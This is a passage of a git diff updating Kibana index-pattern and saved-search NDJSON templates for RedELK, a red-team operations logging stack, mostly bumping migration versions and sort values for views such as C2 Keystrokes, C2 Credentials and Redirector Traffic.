:\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.2", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152847512, 1890], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363337498, 1307], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson index 608fc015..76dff4d3 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.2", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642154954544, 16181], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363339500, 1313], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson index 20cfafce..93a96c38 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.2", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642157817846, 34863], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363341515, 1311], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson index a241cb37..1e19adf1 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson @@ -1,16 +1,16 @@ -{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2152], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2155], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2163], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2166], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2169], "type": "search", "version": "1"} -{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2171], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2174], "type": "search", "version": "1"} -{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2177], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2179], "type": "search", "version": "1"} -{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2181], "type": "search", "version": "1"} -{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2183], "type": "search", "version": "1"} -{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2185], "type": "search", "version": "1"} -{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2187], "type": "search", "version": "1"} -{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": 